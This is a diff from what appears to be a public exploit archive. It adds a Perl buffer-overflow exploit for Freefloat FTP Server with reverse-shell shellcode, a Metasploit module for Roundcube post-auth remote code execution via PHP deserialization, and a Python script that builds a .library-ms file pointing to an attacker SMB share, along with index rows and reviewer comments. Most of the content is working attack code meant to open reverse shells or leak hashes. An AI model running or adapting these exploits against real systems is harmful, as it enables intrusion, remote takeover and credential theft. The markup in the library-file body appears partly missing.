diff --git a/exploits/multiple/remote/52323.txt b/exploits/multiple/remote/52323.txt
new file mode 100644
index 000000000..ecc2410e9
--- /dev/null
+++ b/exploits/multiple/remote/52323.txt
@@ -0,0 +1,85 @@
+# Exploit Title: Freefloat FTP Server 1.0 - Remote Buffer Overflow
+# Date: 22 may 2025
+# Notification vendor: No reported
+# Discovery by: Fernando Mengali
+# LinkedIn: https://www.linkedin.com/in/fernando-mengali-273504142/
+# Version: 1.0
+# Tested on: Windows XP SP3 English - # Version 5.1 (Build 2600.xpsp.080413-2111 : Service Pack 3)
+# Vulnerability Type: Remote Buffer Overflow
+# CVE: CVE-2025-5548
+
+#offset: 246
+
+#badchars: \x00\x0a\x0d
+
+#EIP: 0x7C86467B (JMP ESP)
+#Kernel32.dll
+
+use IO::Socket::INET;
+
+# msfvenom -p windows/shell_reverse_tcp lhost=192.168.232.129 lport=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
+# nc -vlp 4444
+# execute exploit
+
+my $buf =
+"\xda\xd4\xbb\x4e\xd9\xfd\x96\xd9\x74\x24\xf4\x58\x2b\xc9" .
+"\xb1\x52\x31\x58\x17\x83\xc0\x04\x03\x16\xca\x1f\x63\x5a" .
+"\x04\x5d\x8c\xa2\xd5\x02\x04\x47\xe4\x02\x72\x0c\x57\xb3" .
+"\xf0\x40\x54\x38\x54\x70\xef\x4c\x71\x77\x58\xfa\xa7\xb6" .
+"\x59\x57\x9b\xd9\xd9\xaa\xc8\x39\xe3\x64\x1d\x38\x24\x98" .
+"\xec\x68\xfd\xd6\x43\x9c\x8a\xa3\x5f\x17\xc0\x22\xd8\xc4" .
+"\x91\x45\xc9\x5b\xa9\x1f\xc9\x5a\x7e\x14\x40\x44\x63\x11" .
+"\x1a\xff\x57\xed\x9d\x29\xa6\x0e\x31\x14\x06\xfd\x4b\x51" .
+"\xa1\x1e\x3e\xab\xd1\xa3\x39\x68\xab\x7f\xcf\x6a\x0b\x0b" .
+"\x77\x56\xad\xd8\xee\x1d\xa1\x95\x65\x79\xa6\x28\xa9\xf2" .
+"\xd2\xa1\x4c\xd4\x52\xf1\x6a\xf0\x3f\xa1\x13\xa1\xe5\x04" .
+"\x2b\xb1\x45\xf8\x89\xba\x68\xed\xa3\xe1\xe4\xc2\x89\x19" .
+"\xf5\x4c\x99\x6a\xc7\xd3\x31\xe4\x6b\x9b\x9f\xf3\x8c\xb6" .
+"\x58\x6b\x73\x39\x99\xa2\xb0\x6d\xc9\xdc\x11\x0e\x82\x1c" .
+"\x9d\xdb\x05\x4c\x31\xb4\xe5\x3c\xf1\x64\x8e\x56\xfe\x5b" .
+"\xae\x59\xd4\xf3\x45\xa0\xbf\x3b\x31\x42\xbe\xd4\x40\x92" .
+"\xd0\x78\xcc\x74\xb8\x90\x98\x2f\x55\x08\x81\xbb\xc4\xd5" .
+"\x1f\xc6\xc7\x5e\xac\x37\x89\x96\xd9\x2b\x7e\x57\x94\x11" .
+"\x29\x68\x02\x3d\xb5\xfb\xc9\xbd\xb0\xe7\x45\xea\x95\xd6" .
+"\x9f\x7e\x08\x40\x36\x9c\xd1\x14\x71\x24\x0e\xe5\x7c\xa5" .
+"\xc3\x51\x5b\xb5\x1d\x59\xe7\xe1\xf1\x0c\xb1\x5f\xb4\xe6" .
+"\x73\x09\x6e\x54\xda\xdd\xf7\x84\x1f\xd2\x90\x6e\x70\xeb" .
+"\x82\x52\x75\x11\x7b\x02\x0c\x9f\x7b\x6c\x48\x37\x2a\x59" .
+"\x07\x94\x51\xcc\xde\xc5\x30\x84\x22\x97\x58\x0e\x12\x72" .
+"\x5a\x1a\x4b\x9a\x5a\x7c\x4e\x04\x2e\x14\x48\xbc\x67\x9b" .
+"\x9d\x6c\xa9\x79\x0f\x4f\x08\xbd\x2e\xec\xaa\x45\x64\x09" .
+"\xe2\x98\x56\x62\xde\x65\xf2\x48\x4e\xec\x79\x1b\x4c\x9d" .
+"\xa5\xda\x47\xd3\xa5\x53\xa3\xaa\x52\x11\x25\xdb\x6a\x62" .
+"\xc3\x5a\x3a\x90\xab\x70\x4e\x74\x4a\x12\xae\x53\x54\xda" .
+"\x38\x90\x70\x58\x98\xac\x2b\xdb\x7c\x48\x5f\x1e\x4a\x4a" .
+"\x1e\x84\x28";
+
+my $offset = 246; # Será substituído depois
+my $eip = pack('V', 0x7c86467b); # Endereço JMP ESP little endian
+my $nop = "\x90" x 20;
+
+my $padding = "A" x $offset;
+my $payload = $padding . $eip . $nop . $buf;
+
+my $socket = IO::Socket::INET->new(
+ PeerAddr => '192.168.232.135',
+ PeerPort => '21',
+ Proto => 'tcp'
+) or die "Failed to connect: $!\n";
+
+print "Connected to FTP server\n";
+
+my $response = "";
+$response = <$socket>; # banner inicial do FTP
+
+print $socket "USER anonymous\r\n";
+$response = <$socket>;
+print $socket "PASS anonymous\r\n";
+$response = <$socket>;
+
+print $socket "NOOP $payload\r\n";
+$response = <$socket>;
+
+print "Payload sent, check your listener.\n";
+
+close $socket;
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52324.NA b/exploits/multiple/webapps/52324.NA
new file mode 100644
index 000000000..f992624a5
--- /dev/null
+++ b/exploits/multiple/webapps/52324.NA
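Review bot: The trailing comment on `my $offset = 246; # Será substituído depois` says the value "will be replaced later", yet 246 is the final figure already given in the header's `#offset: 246`, so the comment is stale. It and the other two Portuguese comments should be in English like the rest of the header, for example `# filler length, see #offset above`, `# JMP ESP address, little endian` and `# initial FTP banner`. The script also omits `use strict; use warnings;` and is stored as `.txt` although it is Perl, which the header does not say.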
@@ -0,0 +1,238 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+ include Msf::Exploit::CmdStager
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization',
+ 'Description' => %q{
+ Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution
+ by authenticated users because the _from parameter in a URL is not validated
+ in program/actions/settings/upload.php, leading to PHP Object Deserialization.
+
+ An attacker can execute arbitrary system commands as the web server.
+ },
+ 'Author' => [
+ 'Maksim Rogov', # msf module
+ 'Kirill Firsov', # disclosure and original exploit
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ ['CVE', '2025-49113'],
+ ['URL', 'https://fearsoff.org/research/roundcube']
+ ],
+ 'DisclosureDate' => '2025-06-02',
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'SideEffects' => [IOC_IN_LOGS],
+ 'Reliability' => [REPEATABLE_SESSION]
+ },
+ 'Platform' => ['unix', 'linux'],
+ 'Targets' => [
+ [
+ 'Linux Dropper',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64],
+ 'Type' => :linux_dropper,
+ 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+ }
+ ],
+ [
+ 'Linux Command',
+ {
+ 'Platform' => ['unix', 'linux'],
+ 'Arch' => [ARCH_CMD],
+ 'Type' => :nix_cmd,
+ 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0
+ )
+ )
+
+ register_options(
+ [
+ OptString.new('USERNAME', [true, 'Email User to login with', '' ]),
+ OptString.new('PASSWORD', [true, 'Password to login with', '' ]),
+ OptString.new('TARGETURI', [true, 'The URI of the Roundcube Application', '/' ]),
+ OptString.new('HOST', [false, 'The hostname of Roundcube server', ''])
+ ]
+ )
+ end
+
+ class PhpPayloadBuilder
+ def initialize(command)
+ @encoded = Rex::Text.encode_base32(command)
+ @gpgconf = %(echo "#{@encoded}"|base32 -d|sh &#)
+ end
+
+ def build
+ len = @gpgconf.bytesize
+ %(|O:16:"Crypt_GPG_Engine":3:{s:8:"_process";b:0;s:8:"_gpgconf";s:#{len}:"#{@gpgconf}";s:8:"_homedir";s:0:"";};)
+ end
+ end
+
+ def fetch_login_page
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path),
+ 'method' => 'GET',
+ 'keep_cookies' => true,
+ 'vars_get' => { '_task' => 'login' }
+ )
+
+ fail_with(Failure::Unreachable, "#{peer} - No response from web service") unless res
+ fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code #{res.code}") unless res.code == 200
+ res
+ end
+
+ def check
+ res = fetch_login_page
+
+ unless res.body =~ /"rcversion"\s*:\s*(\d+)/
+ fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract version number")
+ end
+
+ version = Rex::Version.new(Regexp.last_match(1).to_s)
+ print_good("Extracted version: #{version}")
+
+ if version.between?(Rex::Version.new(10100), Rex::Version.new(10509))
+ return CheckCode::Appears
+ elsif version.between?(Rex::Version.new(10600), Rex::Version.new(10610))
+ return CheckCode::Appears
+ end
+
+ CheckCode::Safe
+ end
+
+ def build_serialized_payload
+ print_status('Preparing payload...')
+
+ stager = case target['Type']
+ when :nix_cmd
+ payload.encoded
+ when :linux_dropper
+ generate_cmdstager.join(';')
+ else
+ fail_with(Failure::BadConfig, 'Unsupported target type')
+ end
+
+ serialized = PhpPayloadBuilder.new(stager).build.gsub('"', '\\"')
+ print_good('Payload successfully generated and serialized.')
+ serialized
+ end
+
+ def exploit
+ token = fetch_csrf_token
+ login(token)
+
+ payload_serialized = build_serialized_payload
+ upload_payload(payload_serialized)
+ end
+
+ def fetch_csrf_token
+ print_status('Fetching CSRF token...')
+
+ res = fetch_login_page
+ html = res.get_html_document
+
+ token_input = html.at('input[name="_token"]')
+ unless token_input
+ fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract CSRF token")
+ end
+
+ token = token_input.attributes.fetch('value', nil)
+ if token.blank?
+ fail_with(Failure::UnexpectedReply, "#{peer} - CSRF token is empty")
+ end
+
+ print_good("Extracted token: #{token}")
+ token
+ end
+
+ def login(token)
+ print_status('Attempting login...')
+ vars_post = {
+ '_token' => token,
+ '_task' => 'login',
+ '_action' => 'login',
+ '_url' => '_task=login',
+ '_user' => datastore['USERNAME'],
+ '_pass' => datastore['PASSWORD']
+ }
+
+ vars_post['_host'] = datastore['HOST'] if datastore['HOST']
+
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path),
+ 'method' => 'POST',
+ 'keep_cookies' => true,
+ 'vars_post' => vars_post,
+ 'vars_get' => { '_task' => 'login' }
+ )
+
+ fail_with(Failure::Unreachable, "#{peer} - No response during login") unless res
+ fail_with(Failure::UnexpectedReply, "#{peer} - Login failed (code #{res.code})") unless res.code == 302
+
+ print_good('Login successful.')
+ end
+
+ def generate_from
+ options = [
+ 'compose',
+ 'reply',
+ 'import',
+ 'settings',
+ 'folders',
+ 'identity'
+ ]
+ options.sample
+ end
+
+ def generate_id
+ random_data = SecureRandom.random_bytes(8)
+ timestamp = Time.now.to_f.to_s
+ Digest::MD5.hexdigest(random_data + timestamp)
+ end
+
+ def generate_uploadid
+ millis = (Time.now.to_f * 1000).to_i
+ "upload#{millis}"
+ end
+
+ def upload_payload(payload_filename)
+ print_status('Uploading malicious payload...')
+
+ # 1x1 transparent pixel image
+ png_data = Rex::Text.decode_base64('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==')
+ boundary = Rex::Text.rand_text_alphanumeric(8)
+
+ data = ''
+ data << "--#{boundary}\r\n"
+ data << "Content-Disposition: form-data; name=\"_file[]\"; filename=\"#{payload_filename}\"\r\n"
+ data << "Content-Type: image/png\r\n\r\n"
+ data << png_data
+ data << "\r\n--#{boundary}--\r\n"
+
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, "?_task=settings&_remote=1&_from=edit-!#{generate_from}&_id=#{generate_id}&_uploadid=#{generate_uploadid}&_action=upload"),
+ 'ctype' => "multipart/form-data; boundary=#{boundary}",
+ 'data' => data
+ })
+
+ print_good('Exploit attempt complete. Check for session.')
+ end
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/26471.py b/exploits/windows/remote/26471.NA
old mode 100755
new mode 100644
similarity index 100%
rename from exploits/windows/remote/26471.py
rename to exploits/windows/remote/26471.NA
diff --git a/exploits/windows/remote/52325.py b/exploits/windows/remote/52325.py
new file mode 100755
index 000000000..8fee744b4
--- /dev/null
+++ b/exploits/windows/remote/52325.py
@@ -0,0 +1,34 @@
+import os
+import tarfile
+
+def main():
+ file_name = input("Enter your file name: ")
+ ip_address = input("Enter IP (EX: 192.168.1.162): ")
+
+ library_content = f"""
+
+
+
+
+ \\\\{ip_address}\\IT
+
+
+
+
+"""
+
+ library_file_name = f"{file_name}.library-ms"
+ with open(library_file_name, "w", encoding="utf-8") as f:
+ f.write(library_content)
+
+ tar_name = "exploit.tar"
+ with tarfile.open(tar_name, "w") as tarf:
+ tarf.add(library_file_name)
+
+ if os.path.exists(library_file_name):
+ os.remove(library_file_name)
+
+ print("completed")
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8f25a4a54..24225c382 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
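Review bot: `check` falls through to `CheckCode::Safe` for any version outside 10100–10509 and 10600–10610, while the module description says every release before 1.5.10 is affected, so an install older than 1.1.0 would be reported as safe. If the description is right, that fall-through should be `CheckCode::Unknown` for versions below 10100, so that a "Safe" result is not read as "patched". `check` also calls `fail_with` when the version string cannot be extracted, where returning `CheckCode::Unknown` would follow the usual contract for check methods. In `Notes`, `'SideEffects' => [IOC_IN_LOGS]` looks incomplete for the default `Linux Dropper` target, which presumably leaves a staged file on the host; adding `ARTIFACTS_ON_DISK` would tell responders what to look for.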
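Review bot: 52325.py has no header comment at all, unlike the other two files added in this commit, so nothing in the file ties it to a title, author, tested platform or CVE; only the `files_exploits.csv` row does. A header block matching that row should be added, with at least `# CVE: CVE-2025-24071` plus title, author and tested-on lines. The body of `library_content` is blank apart from the UNC path line, which looks like markup lost somewhere between the author's file and this diff, and is worth confirming against the committed blob. `file_name` is taken from `input()` and used unchecked in `f"{file_name}.library-ms"`, so a value containing path separators writes and then deletes a file outside the working directory.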
@@ -10942,6 +10942,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple,,2011-08-03,2015-02-07,1,,,,,,https://www.securityfocus.com/bid/48982/info
 39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",remote,multiple,,2014-06-05,2016-01-11,1,CVE-2014-0007;OSVDB-108277,,,,,https://www.securityfocus.com/bid/68117/info
 52308,exploits/multiple/remote/52308.py,"Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-0204,,,,,
+52323,exploits/multiple/remote/52323.txt,"Freefloat FTP Server 1.0 - Remote Buffer Overflow",2025-06-13,"Fernando Mengali",remote,multiple,,2025-06-13,2025-06-13,0,CVE-2025-5548,,,,,
 23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",remote,multiple,,2004-02-16,2012-12-31,1,CVE-2004-0290;OSVDB-3982,,,,,https://www.securityfocus.com/bid/9671/info
 29873,exploits/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,remote,multiple,,2007-04-20,2013-11-28,1,CVE-2007-2191;OSVDB-35315,,,,,https://www.securityfocus.com/bid/23575/info
 47698,exploits/multiple/remote/47698.rb,"FreeSWITCH - Event Socket Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,,2019-11-20,2019-11-20,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/misc/freeswitch_event_socket_cmd_exec.rb
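Review bot: The new 52323 row files the entry under platform `multiple`, but the exploit's own header lists only Windows XP SP3 under "Tested on" and takes its return address from Kernel32.dll. Anyone filtering the index by platform to gauge Windows exposure will miss it. Consider `windows` in the platform column, with the matching directory, as the PCMan FTP Server rows elsewhere in this diff use.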
@@ -12341,6 +12342,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,,2019-06-17,2019-06-17,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
 52081,exploits/multiple/webapps/52081.txt,"reNgine 2.2.0 - Command Injection (Authenticated)",2024-10-01,"Caner Tercan",webapps,multiple,,2024-10-01,2024-10-01,0,,,,,,
 18553,exploits/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",webapps,multiple,,2012-03-03,2012-03-16,0,OSVDB-85702;OSVDB-79806;CVE-2012-4996;CVE-2012-4993;OSVDB-79805,,,,http://www.exploit-db.comrivettracker_1-03.zip,
+52324,exploits/multiple/webapps/52324.NA,"Roundcube 1.6.10 - Remote Code Execution (RCE)",2025-06-13,"Maksim Rogov",webapps,multiple,,2025-06-13,2025-06-13,0,CVE-2025-49113,,,,,
 52127,exploits/multiple/webapps/52127.py,"Royal Elementor Addons and Templates 1.3.78 - Unauthenticated Arbitrary File Upload",2025-04-05,4m3rr0r,webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2023-5360,,,,,
 11405,exploits/multiple/webapps/11405.txt,"RSA - SecurID Cross-Site Scripting",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,OSVDB-43844;CVE-2008-1470,,,,,
 48639,exploits/multiple/webapps/48639.txt,"RSA IG&L Aveksa 7.1.1 - Remote Code Execution",2020-07-06,"Jakub Palaczynski",webapps,multiple,,2020-07-06,2020-07-06,0,CVE-2019-3759,,,,,
@@ -14236,7 +14238,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php,,2009-09-09,,1,OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943,,,,,
 5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php,,2008-06-14,2016-12-09,1,OSVDB-53697;CVE-2008-6665,,,,http://www.exploit-db.comAnanta10b5.zip,
 48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,,2020-09-25,2020-09-25,0,,,,,,
-52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-37732,,,,,
+52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-06-13,0,CVE-2024-37732,,,,,
 37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php,,2012-04-20,2015-05-24,1,,,,,,https://www.securityfocus.com/bid/53181/info
 26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php,,2013-07-18,2013-07-21,1,OSVDB-95568;CVE-2013-5099,,,,http://www.exploit-db.comanchor-cms-0.9.1.zip,
 27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-26,2013-07-28,1,CVE-2006-0462;OSVDB-22755,,,,,https://www.securityfocus.com/bid/16393/info
@@ -45191,7 +45193,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40680,exploits/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Remote Buffer Overflow",2016-11-02,Eagleblack,remote,windows,,2016-11-02,2016-11-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-02-at-135629.png,http://www.exploit-db.comPCMan.7z,
 38340,exploits/windows/remote/38340.py,"PCMan FTP Server 2.0.7 - Directory Traversal",2015-09-28,"Jay Turla",remote,windows,21,2015-09-28,2015-09-28,0,CVE-2015-7601;OSVDB-128191,,,,http://www.exploit-db.comPCMan.7z,
 27007,exploits/windows/remote/27007.rb,"PCMan FTP Server 2.0.7 - Remote (Metasploit)",2013-07-22,MSJ,remote,windows,21,2013-07-22,2013-07-22,1,OSVDB-94624;CVE-2013-4730,"Metasploit Framework (MSF)",,,http://www.exploit-db.comPCMan.7z,
-26471,exploits/windows/remote/26471.py,"PCMan FTP Server 2.0.7 - Remote Buffer Overflow",2013-06-27,"Jacob Holcomb",remote,windows,21,2013-06-27,2013-06-29,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
+26471,exploits/windows/remote/26471.NA,"PCMan FTP Server 2.0.7 - Remote Buffer Overflow",2013-06-27,"Jacob Holcomb",remote,windows,21,2013-06-27,2025-06-13,0,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
 31254,exploits/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
 31255,exploits/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
 27277,exploits/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow",2013-08-02,Ottomatik,remote,windows,,2013-08-02,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-08-08-at-34942-pm.png,http://www.exploit-db.comPCMan.7z,
@@ -45956,6 +45958,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
 51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
 52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
+52325,exploits/windows/remote/52325.py,"Windows File Explorer Windows 10 Pro x64 - TAR Extraction",2025-06-13,"Daniel Miranda",remote,windows,,2025-06-13,2025-06-13,0,CVE-2025-24071,,,,,
 52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,,
 30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info
 16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,,
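Review bot: The 26471 row changes more than its path: the field after the updated date goes from `1` to `0` and the extension from `.py` to `.NA`, while the rename itself is recorded at 100% similarity with the mode dropped from 100755 to 100644. Nothing visible in the commit explains why an unchanged file is reclassified. If that field is the verified flag (the column name is cut off in the hunk header), the reason for clearing it should be recorded. In the following hunk the 52325 row is titled "TAR Extraction", whereas the adjacent 52310 row for the same CVE-2025-24071 is titled "NTLM Hash Disclosure"; naming the impact in the title would keep the two entries findable together.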